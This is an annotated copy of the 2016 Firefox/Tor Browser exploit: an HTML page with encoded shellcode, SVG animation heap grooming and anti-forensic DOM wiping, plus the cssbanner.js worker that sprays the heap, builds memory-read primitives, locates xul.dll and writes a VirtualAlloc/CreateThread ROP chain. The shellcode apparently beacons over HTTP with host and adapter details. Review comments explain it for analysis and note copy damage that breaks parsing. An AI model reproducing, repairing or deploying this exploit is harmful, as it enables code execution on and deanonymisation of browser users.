Firefox/TOR 0day — this appears to be the Firefox / Tor Browser exploit that circulated on 30 November 2016 (an SVG animation use-after-free, later tracked as CVE-2016-9079 and fixed in Firefox 50.0.2 / ESR 45.5.1). The page below and the inlined `cssbanner.js` worker are live attack code, not a proof-of-concept: do not open this in a browser; analyse it only inside an isolated VM with no network access.
<html> | |
<head> | |
<script> | |
// Payload handed to the worker as a string of \uXXXX escapes. The worker does
// not execute it directly: it repacks two 16-bit units per dword into the
// ROP/shellcode buffer (see the cssbanner.js listing after </html>). The bytes
// are not decoded here, but read little-endian the tail of the string is plain
// ASCII: "\r\nAccept-Encoding: gzip\r\n", "Cookie: MC=", "ws2_32",
// "IPHLPAPI", "GET /0a821a80/05dc0212 HTTP/1.1\r\n" and "Host: " followed by
// zero padding -- i.e. the payload presumably builds an HTTP request over
// Winsock (and, given IPHLPAPI, likely reads adapter information); the remote
// host is not present in this string and is filled in elsewhere.
// NOTE(review): the odd "\ u00ec" spacing on the second line is damage from
// the copy/paste, not valid escape syntax; the listing does not run as shown.
// NOTE(review): this is published attack code -- do not load in a browser;
// handle only in an isolated analysis VM.
var thecode = '\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u8578\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3bf8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8bd3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u8029\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u5040\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u0001\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u8951\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u0248\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue857\u00fa\u0000\u895e\u8dca\ua7bd\u0002\ | |
ue800\ u00ec\ u0000\ u834f\ u20fa\ u057c\ u20ba\ u0000\ u8900\ u56d1\ ua4f3\ u0db9\ u0000\ u8d00\ u8ab5\ u0002\ uf300\ u89a4\ u44bd\ u0002\ u5e00\ u6856\ u28a9\ u8034\ ud5ff\ uc085\ u840f \u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue789\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u7709\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u3004\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u5357\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u6853\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc349\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\uffff\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a67\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u4700\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u3132\u2032\u5448\u5054\u312f\u312e\u0a0d\ | |
u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u4190'; | |
// The worker script is fetched relative to this page (a separate file on the
// serving host); its source is reproduced after the closing </html> tag.
var worker = new Worker('cssbanner.js'); | |
worker.postMessage(thecode); | |
// Page-side state shared by exploit() and craftDOM().
// heap80/heap100 will hold thousands of 0x80- and 0x100-byte ArrayBuffer
// copies used to groom the content-process heap; arrBase is filled in from
// the worker's first message; animateX/containerA are set by craftDOM().
// sprayBase is assigned here and never referenced again in this file.
var svgns = 'http://www.w3.org/2000/svg'; | |
var heap80 = new Array(0x1000); | |
var heap100 = new Array(0x4000); | |
var block80 = new ArrayBuffer(0x80); | |
var block100 = new ArrayBuffer(0x100); | |
var sprayBase = undefined; | |
var arrBase = undefined; | |
var animateX = undefined; | |
var containerA = undefined; | |
// Build-specific layout offset subtracted from arrBase when exploit() writes
// its fake pointers: 0x90 by default, 0x88 for Firefox 47 and later. The
// choice is made purely from the User-Agent string, so a spoofed UA selects
// the wrong offset (which object the offset refers to is not visible here).
var offset = 0x90; | |
if (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent)) { | |
offset = 0x88; // versions 47.0 or greater | |
} | |
// Shorthand for document.getElementById(); defined but not referenced
// anywhere else on this page.
var $ = function(id) {
  var element = document.getElementById(id);
  return element;
};
// DOM-side trigger, invoked from worker.onmessage once the worker has
// reported arrBase. Note that the loop index `i` is never declared, so it
// leaks as an implicit global shared with the rest of the page.
var exploit = function() { | |
// Template for every 0x80-byte buffer: three dword slots (2, 8, 0xE) hold the
// same pointer into the worker's sprayed region (arrBase - offset). Each
// block80.slice(0) below is a copy of this template.
var u32 = new Uint32Array(block80) | |
u32[0x2] = arrBase - offset; | |
u32[0x8] = arrBase - offset; | |
u32[0xE] = arrBase - offset; | |
// Groom, first half: copies of the 0x100 template into the upper half of
// heap100 and of the 0x80 template into the lower half of heap80.
for (i = heap100.length / 2; i < heap100.length; i++) { | |
heap100[i] = block100.slice(0) | |
} | |
for (i = 0; i < heap80.length / 2; i++) { | |
heap80[i] = block80.slice(0) | |
} | |
// Rewriting animateX's 'begin' twice forces the SMIL timeline to recompute
// intervals; presumably this is where the object that is later reused gets
// released (the freed type is not visible from this file).
animateX.setAttribute('begin', '59s') | |
animateX.setAttribute('begin', '58s') | |
// Groom, second half: fill the remaining slots so the freed allocation is
// reclaimed by one of the template copies.
for (i = heap80.length / 2; i < heap80.length; i++) { | |
heap80[i] = block80.slice(0) | |
} | |
for (i = heap100.length / 2; i < heap100.length; i++) { | |
heap100[i] = block100.slice(0) | |
} | |
// Another pair of 'begin' rewrites, then pauseAnimations() on the first
// container. This is the last page-side action; everything after it happens
// in the worker, which is polling its spray for the resulting corruption.
animateX.setAttribute('begin', '10s') | |
animateX.setAttribute('begin', '9s') | |
window.dump('PAUSING!!! YAYA'); | |
containerA.pauseAnimations(); | |
} | |
// Page-side message pump. The worker posts twice: first a number (the address
// it assumes its spray landed at, used here as arrBase), later a string once it
// has finished writing the ROP chain. The handler replaces itself on the first
// message so the second one only schedules cleanup.
worker.onmessage = function(e) { | |
// Second message: one second later, kill the worker and blank the page (body,
// head and the onload attribute). Anti-forensic: the DOM inspector then shows
// an empty document. The original markup and cssbanner.js are typically still
// recoverable from the browser cache, view-source, or a network capture.
worker.onmessage = function(e) { | |
window.setTimeout(function() { | |
worker.terminate(); | |
document.body.innerHTML = ''; | |
document.getElementsByTagName('head')[0].innerHTML = ''; | |
document.body.setAttribute('onload', '') | |
}, 1000); | |
} | |
// First message: record the spray address and run the DOM-side trigger.
arrBase = e.data; | |
exploit(); | |
} | |
// Returns a pseudo-random element id of the form "id" + four lowercase hex
// digits. (1 + random) * 0x10000 always yields five hex digits, so dropping
// the leading one leaves exactly four. Math.random() is fine here -- these ids
// only need to be unique within the page, not unpredictable.
var idGenerator = function() {
  var scaled = Math.floor((1 + Math.random()) * 0x10000);
  var hex = scaled.toString(16);
  return 'id' + hex.slice(1);
};
// Builds the SVG/SMIL object graph the trigger depends on and attaches it to
// the document. Two <svg> roots are created: containerA holds animateX (the
// element whose 'begin' is rewritten in exploit()) plus animateA and animateB;
// containerB holds animateC. The timing attributes chain across the two
// containers -- animateB ends when animateC ends ('idC.end'), animateC ends
// when animateA ends ('idA.end') -- and pauseAnimations() is later called on
// containerA only. Which SMIL object this arrangement frees is not visible
// here (presumably an interval/timing record shared between the containers).
var craftDOM = function() { | |
containerA = document.createElementNS(svgns, 'svg') | |
var containerB = document.createElementNS(svgns, 'svg'); | |
animateX = document.createElementNS(svgns, 'animate') | |
var animateA = document.createElementNS(svgns, 'animate') | |
var animateB = document.createElementNS(svgns, 'animate') | |
var animateC = document.createElementNS(svgns, 'animate') | |
// Random ids keep the cross-references (idC.end, idA.end) unique per load.
var idX = idGenerator(); | |
var idA = idGenerator(); | |
var idB = idGenerator(); | |
var idC = idGenerator(); | |
animateX.setAttribute('id', idX); | |
animateA.setAttribute('id', idA); | |
animateA.setAttribute('end', '50s'); | |
animateB.setAttribute('id', idB); | |
animateB.setAttribute('begin', '60s'); | |
animateB.setAttribute('end', idC + '.end'); | |
animateC.setAttribute('id', idC); | |
animateC.setAttribute('begin', '10s'); | |
animateC.setAttribute('end', idA + '.end'); | |
containerA.appendChild(animateX) | |
containerA.appendChild(animateA) | |
containerA.appendChild(animateB) | |
containerB.appendChild(animateC) | |
document.body.appendChild(containerA); | |
document.body.appendChild(containerB); | |
} | |
// The DOM is built on load; the actual trigger waits for the worker's message.
window.onload = craftDOM; | |
// | |
</script> | |
<style> | |
#mtdiv { | |
position: absolute; | |
width: 960px; | |
height: 166px; | |
z-index: 15; | |
top: 100px; | |
left: 50%; | |
margin: 0 0 0 -480px; | |
} | |
</style> | |
</head> | |
<body bgcolor='#2F3236'> | |
<div id='mtdiv'> | |
<img src='mt.png' /> | |
</div> | |
</body> | |
<script> | |
// Decoy navigation: two seconds after the page is parsed it moves on to
// member.php so the visitor sees an ordinary-looking page while the worker
// keeps running. String-form setTimeout (implicit eval) -- a tell when hunting
// for this kit in captured pages.
setTimeout('window.location = \'member.php\';', 2000); | |
</script> | |
</html> | |
<!-- content of "cssbanner.js": the Web Worker script fetched by new Worker('cssbanner.js') in the page above (a separate file on the serving host), inlined here for reference -->
<script> | |
// Worker half of the exploit (32-bit Windows only: PE header parsing,
// kernel32 imports, 4 GiB wrap-around arithmetic). Flow:
//   1. spray the worker heap with ~400 copies of a ~2 MiB double array laid
//      out as a fake object graph (sprayArrays), at an assumed fixed address
//      arrBase = 0x30000030;
//   2. report arrBase to the page, which performs the DOM-side trigger;
//   3. busy-poll the spray until the corruption shows up as a non-object in
//      the slot that held `memory`, leaking that Uint32Array's address;
//   4. turn `memory` into an arbitrary-read view, locate xul.dll via a
//      leaked pointer, resolve VirtualAlloc / CreateThread from its import
//      table, write a ROP chain + stub + payload into ropArrBuf;
//   5. swap object pointers in the spray so the chain runs, then post back.
// NOTE(review): every offset (o1..o11, vtable_offset 300/304/308, and the
// 0x88/0x90 offset on the page side) is build-specific. Both poll loops
// (steps 3 and 4) have no exit condition, so on a patched or mismatched
// browser the worker spins at 100% CPU until the tab is closed.
// NOTE(review): this copy of the listing is damaged -- string literals are
// split across raw newlines ("Bad / NT / Signature", "EAX", "kernel32.dll",
// "VirtualAlloc") and identifiers contain stray spaces ("t his.module_base",
// "d .toUpperCase") -- so it does not parse as pasted. Treat it as a
// reference for analysis, not a faithful reproduction of the served file.
self.onmessage = function(msg) { | |
thecode = msg.data; | |
// Helper to pack a dword into two UTF-16 units; defined but not used below.
var pack = function(b) { | |
var a = b >> 16; | |
return String.fromCharCode(b & 65535) + String.fromCharCode(a) | |
}; | |
// Memory(base, readFn, writeFn): absolute-address read primitive built on top
// of a closure that indexes the (later corrupted) `memory` Uint32Array.
// Addresses below `base` are wrapped modulo 2^32 so the whole 32-bit space is
// reachable once the array's length field has been enlarged. The write side
// (_abs_write / write) is present but never exercised below; all corruption
// is done by assigning into the sprayed double arrays instead.
function Memory(b, a, f) { | |
this._base_addr = b; | |
this._read = a; | |
this._write = f; | |
this._abs_read = function(a) { | |
a >= this._base_addr ? a = this._read(a - this._base_addr) : (a = 4294967295 - this._base_addr + 1 + a, a = this._read(a)); | |
return 0 > a ? 4294967295 + a + 1 : a | |
}; | |
this._abs_write = function(a, b) { | |
a >= this._base_addr ? this._write(a - this._base_addr, b) : (a = 4294967295 - this._base_addr + 1 + a, this._write(a, b)) | |
}; | |
this.readByte = function(a) { | |
return this.read(a) & 255 | |
}; | |
this.readWord = function(a) { | |
return this.read(a) & 65535 | |
}; | |
this.readDword = function(a) { | |
return this.read(a) | |
}; | |
// Unaligned reads are assembled from the two surrounding aligned dwords.
this.read = function(a, b) { | |
if (a % 4) { | |
var c = this._abs_read(a & 4294967292), | |
d = this._abs_read(a + 4 & 4294967292), | |
e = a % 4; | |
return c >>> 8 * e | d << | |
8 * (4 - e) | |
} | |
return this._abs_read(a) | |
}; | |
// NUL-terminated ASCII read, capped at 32 bytes (returns "" if no NUL is
// found within the cap) -- used for DLL and import names.
this.readStr = function(a) { | |
for (var b = "", c = 0;;) { | |
if (32 == c) return ""; | |
var d = this.readByte(a + c); | |
if (0 == d) break; | |
b += String.fromCharCode(d); | |
c++ | |
} | |
return b | |
}; | |
this.write = function(a) {} | |
} | |
// PE(mem, hintAddr): minimal in-memory PE parser. find_module_base rounds the
// hint down to 64 KiB and walks downwards until it finds the "MZ" magic
// (23117 == 0x5A4D); there is no lower bound, so a bad hint faults.
function PE(b, a) { | |
this.mem = b; | |
this.export_table = this.module_base = void 0; | |
this.export_table_size = 0; | |
this.import_table = void 0; | |
this.import_table_size = 0; | |
this.find_module_base = function(a) { | |
for (a &= 4294901760; a;) { | |
if (23117 == this.mem.readWord(a)) return this.module_base = a; | |
a -= 65536 | |
} | |
}; | |
// Reads e_lfanew (+0x3C), checks the "PE\0\0" signature (17744 == 0x4550),
// then records the export (+0x78/+0x7C) and import (+0x80/+0x84) directory
// RVAs. The rest of this constructor, the ROP helper and sprayArrays follow
// on the next lines in collapsed/minified form:
//   - resolve_imported_function(dll, name): walks the import descriptors
//     (20 bytes each), matches the DLL name case-insensitively, then walks the
//     original-first-thunk names to return the corresponding IAT entry.
//   - ROP(mem, hint): gadget search starts at module_base + 0x1000 and scans
//     forward with no upper bound. findStackPivot looks for 0x94 0xC3
//     (xchg eax,esp; ret), findPopRet for 0x58 0xC3 (pop eax; ret). ropChain
//     fills a 4 KiB Uint32Array: pivots at the vtable_offset slots, then a
//     VirtualAlloc(base, 0x1000, MEM_COMMIT=0x1000, PAGE_EXECUTE_READWRITE=0x40)
//     frame, terminated by the 0xCCCCCCCC (3435973836) marker that the tail of
//     this handler searches for.
//   - qword2Double/doubleFromFloat: reinterpret two dwords as one double and
//     back, via a shared 8-byte ArrayBuffer (the spray stores raw pointers as
//     doubles).
//   - sprayArrays: one 262138-element double array (~2 MiB), with a fake
//     object graph written every 512 slots (object headers, a `memory`
//     reference at +1, pointers into arrBase + o1..o11), copied 400 times
//     into spr[] (~800 MiB of spray).
this._resolve_pe_structures = function() { | |
peFile = this.module_base + this.mem.readWord(this.module_base + 60); | |
if (17744 != this.mem.readDword(peFile)) throw "Bad | |
NT | |
Signature ";this.pe_file=peFile;this.optional_header=this.pe_file+36;this.export_directory=t his.module_base+this.mem.readDword(this.pe_file+120);this.export_directory_size=this.mem.readDword(this.pe_file+124);this.import_directory=this.module_base+this.mem.readDword(this.pe_file+128);this.import_directory_size=this.mem.readDword(this.pe_file+132)};this.resolve_imported_function=function(a,b){void 0==this.import_directory&&this._resolve_pe_structures();for(var e=this.import_directory,c=e+this.import_directory_size;e<c;){var d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base);if(a.toUpperCase()==d .toUpperCase()){for(var c=this.mem.readDword(e)+this.module_base,e=this.mem.readDword(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!=d;){if(this.mem.readStr(d+this.module_base+2).toUpperCase()==b.toUpperCase())return this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}break}e+=20}return 0};void 0!=a&&this.find_module_base(a)} function ROP(b,a){this.mem=b;this.pe=new PE(b,a);this.pe._resolve_pe_structures();this.module_base=this.pe.module_base+4096;this.findSequence=function(a){for(var b=0;;){for(var e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base+b+c)==a[c]&&e==c)e++;else break;if(e==a.length)return this.module_base+b;b++}};this.findStackPivot=function(){return this.findSequence([148,195])};this.findPopRet=function(a){return this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void 0!=c?c:new ArrayBuffer(4096); c=new Uint32Array(c);var d=this.findStackPivot(),f=this.findPopRet( " | |
EAX "),g=this.pe.resolve_imported_function( " | |
kernel32.dll ", " | |
VirtualAlloc ");c[0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>>2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a;c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836;return c}} var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b;convu32[1]=a;return convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return convu32[a]},sprayArrays=function(){for(var b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a < | |
b.length; | |
a += 512) b[a + 1] = memory, b[a + 21] = qword2Double(0, 2), b[a + 14] = qword2Double(arrBase + o1, 0), b[a + (o1 + 8) / 8] = qword2Double(arrBase + o2, 0), b[a + (o2 + 0) / 8] = qword2Double(2, 0), b[a + (o2 + 8) / 8] = qword2Double(arrBase + o3, arrBase + 13), b[a + (o3 + 0) / 8] = qword2Double(16, 0), b[a + (o3 + 24) / 8] = qword2Double(2, 0), b[a + (o3 + 32) / 8] = qword2Double(arrBase + o5, arrBase + o4), b[a + (o4 + 0) / 8] = qword2Double(0, arrBase + o6), b[a + (o5 + 0) / 8] = qword2Double(arrBase + o7, 0), b[a + (o6 + 8) / 8] = qword2Double(2, 0), b[a + (o7 + 8) / 8] = qword2Double(arrBase + o7 + 16, 0), b[a + (o7 + 16) / 8] = qword2Double(0, 4026531840), b[a + (o7 + 32) / 8] = qword2Double(0, 3220176896), b[a + (o7 + 48) / 8] = qword2Double(2, 0), b[a + (o7 + 56) / 8] = qword2Double(1, 0), b[a + (o7 + 96) / 8] = qword2Double(arrBase + o8, arrBase + o8), b[a + (o7 + 112) / 8] = qword2Double(arrBase + o9, arrBase + o9 + 16), b[a + (o7 + 168) / 8] = qword2Double(0, 2), b[a + (o9 + 0) / 8] = qword2Double(arrBase + o10, 2), b[a + (o10 + 0) / 8] = qword2Double(2, 0), b[a + (o10 + 8) / 8] = qword2Double(0, 268435456), b[a + (o11 + 8) / 8] = qword2Double(arrBase + o11 + 16, 0), b[a + (o11 + 16) / 8] = qword2Double(0, 4026531840), b[a + (o11 + 32) / 8] = qword2Double(0, 3220176896), b[a + (o11 + 48) / 8] = qword2Double(2, 0), b[a + (o11 + 56) / 8] = qword2Double(1, 0), b[a + (o11 + 96) / 8] = qword2Double(arrBase + o8, arrBase + o8), b[a + (o11 + 112) / 8] = qword2Double(arrBase + o9, arrBase + o9 + 16), b[a + (o11 + 168) / 8] = qword2Double(0, 2); | |
// 400 copies of the template array; each slice is a fresh allocation.
for (a = 0; a < spr.length; a++) spr[a] = b.slice(0) | |
}, vtable_offset = 300; | |
// Build-specific vtable slot offset chosen from the User-Agent (available in
// worker scope): 304 for Firefox 41.0.x/42.0, 308 for 43 and later, else 300.
/.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent) ? vtable_offset = 304 : /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigator.userAgent) && (vtable_offset = 308); | |
// Spray parameters. arrBase (805306416 == 0x30000030) is the address the
// spray is *assumed* to land at -- there is no leak backing it, the exploit
// relies on the allocator placing a ~800 MiB spray predictably. o1..o11 are
// byte offsets of the fake sub-objects inside each 512-slot (4 KiB) cell;
// `memory` is the 16-element Uint32Array that is later corrupted into the
// read primitive, `len` its pristine length used to detect that corruption.
var spr = Array(400), | |
arrBase = 805306416, | |
ropArrBuf = new ArrayBuffer(4096), | |
o1 = 176, | |
o2 = 256, | |
o3 = 768, | |
o4 = 832, | |
o5 = 864, | |
o6 = 928, | |
o7 = 1024, | |
o8 = 1280, | |
o9 = 1344, | |
o10 = 1376, | |
o11 = 1536, | |
oRop = 1792, | |
memory = new Uint32Array(16), | |
len = memory.length, | |
arr_index = 0, | |
arr_offset = 0; | |
fzero = qword2Double(0, 0); | |
// Pad the payload to an even number of UTF-16 units (0x9090 == two NOPs) so it
// packs cleanly into dwords below.
0 != thecode.length % 2 && (thecode += "\u9090"); | |
sprayArrays(); | |
// Hand arrBase to the page; the DOM-side trigger runs from its onmessage.
postMessage(arrBase); | |
// Poll (forever, if nothing happens) until some cell's slot +1 -- which held a
// reference to `memory` -- is no longer tagged as an object. Reading it as a
// double then yields the address of the Uint32Array (memarrayloc). The cell is
// then rewritten: a 65-element fake at o2 whose entries point at
// memarrayloc + 27, o5 redirected to the o11 sub-object, and two flag words
// at o7 + 168 / o7 + 88 -- presumably the edit that causes the page side to
// overwrite `memory`'s length/data fields (not verifiable from here).
for (memarrayloc = void 0; void 0 == memarrayloc;) | |
for (i = 0; i < spr.length; i++) | |
for (offset = 0; offset < spr[i].length; offset += 512) | |
if ("object" != typeof spr[i][offset + 1]) { | |
memarrayloc = doubleFromFloat(spr[i][offset + 1], 0); | |
arr_index = i; | |
arr_offset = offset; | |
spr[i][offset + (o2 + 0) / 8] = qword2Double(65, 0); | |
spr[i][offset + (o2 + 8) / 8] = qword2Double(arrBase + o3, memarrayloc + 27); | |
for (j = 0; 33 > j; j++) spr[i][offset + (o2 + 16) / 8 + j] = qword2Double(memarrayloc + 27, memarrayloc + 27); | |
spr[i][offset + (o3 + 8) / 8] = qword2Double(0, 0); | |
spr[i][offset + (o5 + 0) / 8] = qword2Double(arrBase + o11, 0); | |
spr[i][offset + (o7 + 168) / 8] = qword2Double(0, 3); | |
spr[i][offset + (o7 + 88) / 8] = qword2Double(0, 2); | |
break | |
} | |
// Second unbounded spin: wait until `memory.length` changes, i.e. its length
// field has been overwritten and the view now reaches far beyond 16 elements.
for (; memory.length == len;); | |
// Read primitive anchored 48 bytes past the leaked object; reads index the
// enlarged `memory` view. xulPtr is the dword at +12 of that object and, per
// its name, is expected to point into xul.dll -- PE.find_module_base walks
// down from it to the image base.
var mem = new Memory(memarrayloc + 48, function(b) { | |
return memory[b / 4] | |
}, function(b, a) { | |
memory[b / 4] = a | |
}), | |
xulPtr = mem.readDword(memarrayloc + 12); | |
// Briefly store ropArrBuf in the corrupted cell to leak its object address
// (read back from arrBase + 8), then dereference +16 for its data pointer.
spr[arr_index][arr_offset + 1] = ropArrBuf; | |
ropPtr = mem.readDword(arrBase + 8); | |
spr[arr_index][arr_offset + 1] = null; | |
ropBase = mem.readDword(ropPtr + 16); | |
// Gadget hunting in xul.dll and construction of the VirtualAlloc chain inside
// ropArrBuf (10 pivot slots starting at vtable_offset).
var rop = new ROP(mem, xulPtr); | |
rop.ropChain(ropBase, vtable_offset, 10, ropArrBuf); | |
// 0x89 0x01 0xC3 == mov [ecx], eax; ret -- placed in slot 0 of the chain.
var backupESP = rop.findSequence([137, 1, 195]), | |
ropChain = new Uint32Array(ropArrBuf); | |
ropChain[0] = backupESP; | |
CreateThread = rop.pe.resolve_imported_function("KERNEL32.dll", "CreateThread"); | |
// Find the 0xCCCCCCCC terminator left by ropChain() and append, as raw
// dwords, a short hand-assembled x86 stub (the first one decodes to
// nop; nop; add esp, 0x800; the rest is not disassembled here, but it embeds
// the resolved CreateThread address and arrBase + 16) followed by the packed
// payload. Note `i` continues from the terminator's index.
for (var i = 0; i < | |
ropChain.length && 3435973836 != ropChain[i]; i++); | |
ropChain[i++] = 3296825488; | |
ropChain[i++] = 2048; | |
ropChain[i++] = 1347469361; | |
ropChain[i++] = 1528949584; | |
ropChain[i++] = 3092271187; | |
ropChain[i++] = CreateThread; | |
ropChain[i++] = 3096498431; | |
ropChain[i++] = arrBase + 16; | |
ropChain[i++] = 1955274891; | |
ropChain[i++] = 280697892; | |
ropChain[i++] = 704643071; | |
ropChain[i++] = 2425406428; | |
ropChain[i++] = 4294957800; | |
ropChain[i++] = 2425393407; | |
// Two UTF-16 units per dword, low unit first (little-endian).
for (var j = 0; j < thecode.length; j += 2) ropChain[i++] = thecode.charCodeAt(j) + 65536 * thecode.charCodeAt(j + 1); | |
// Final pointer swap in the corrupted cell: slot 2 now points at the ROP
// buffer's data (ropBase), slots 0/3 at arrBase + 16 and a 0x100 flag, plus
// the same two o11 flag words as before -- presumably what makes the next
// page-side virtual call land on the chain (not verifiable from this file).
spr[arr_index][arr_offset] = qword2Double(arrBase + 16, 0); | |
spr[arr_index][arr_offset + 3] = qword2Double(0, 256); | |
spr[arr_index][arr_offset + 2] = qword2Double(ropBase, 0); | |
spr[arr_index][arr_offset + (o11 + 168) / 8] = qword2Double(0, 3); | |
spr[arr_index][arr_offset + (o11 + 88) / 8] = qword2Double(0, 2); | |
// The page treats this message as "done" and wipes the DOM one second later.
postMessage("GREAT SUCCESS "); }; |